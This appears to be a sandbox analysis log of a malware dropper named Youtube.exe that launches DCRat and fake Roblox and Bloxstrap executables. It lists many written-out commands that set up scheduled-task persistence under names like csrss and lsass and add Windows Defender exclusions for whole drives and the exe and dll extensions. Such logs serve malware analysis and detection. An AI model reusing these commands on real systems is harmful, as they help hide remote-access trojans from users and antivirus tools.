PID 1976 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2548 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2548 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2548 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2548 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2740 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1972 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2908 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2548 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe

"C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"

C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe

"C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"

C:\Users\Admin\AppData\Local\Temp\Result.exe

"C:\Users\Admin\AppData\Local\Temp\Result.exe"

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\solara.exe

"C:\Users\Admin\AppData\Local\Temp\solara.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Windows\AppPatch\ja-JP\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\AppPatch\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Windows\AppPatch\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 6 /tr "'C:\winNet\Bloxstrap.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 7 /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\Refcrt.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\MSOCache\All Users\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Common Files\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Music\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\Music\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Music\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Windows\twain_32\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\twain_32\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Windows\twain_32\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\Windows\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\Windows\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft\Windows\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 12 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 6 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\CRMLog\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\AppPatch\ja-JP\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Bloxstrap.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\services.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Music\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\sppsvc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\Windows\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'

C:\Windows\twain_32\sppsvc.exe

"C:\Windows\twain_32\sppsvc.exe"

C:\Windows\SysWOW64\msiexec.exe

"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\CMD.exe

"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\MsiExec.exe

C:\Windows\system32\MsiExec.exe -Embedding 24DB5C81B615D0AD00A42217A5D9562F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C1A7B264966EDDF33BCF128627D0C296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1192 -s 1656

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet/ComContainerbrowserRefRuntime.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0lbrM5rdln.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "

C:\DriversavessessionDlldhcp\Roblox.exe

"C:\DriversavessessionDlldhcp/Roblox.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Local\Roblox.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Roblox.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\Roblox.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ltcsaawt\ltcsaawt.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDF.tmp" "c:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\CSC37168581A8D94A6C84CFBC64B17B38F4.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2winfxb\a2winfxb.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4C.tmp" "c:\Users\Admin\Music\CSC6D5C1AFCD1984D5EBFD1EC6CEC5D8814.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zo10lvbw\zo10lvbw.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1056.tmp" "c:\Windows\AppPatch\ja-JP\CSCC375D023683141EC9126F98C4EDA9BAD.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3q4jp1de\3q4jp1de.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10B3.tmp" "c:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\CSCA59D324A68AE4B22A6E15266FD9E16AA.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q01gslrh\q01gslrh.cmdline"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1130.tmp" "c:\Program Files (x86)\Common Files\DESIGNER\CSCF7CCF5184CCC4DE8B28EE88B3840D7E9.TMP"

C:\Windows\system32\schtasks.exe
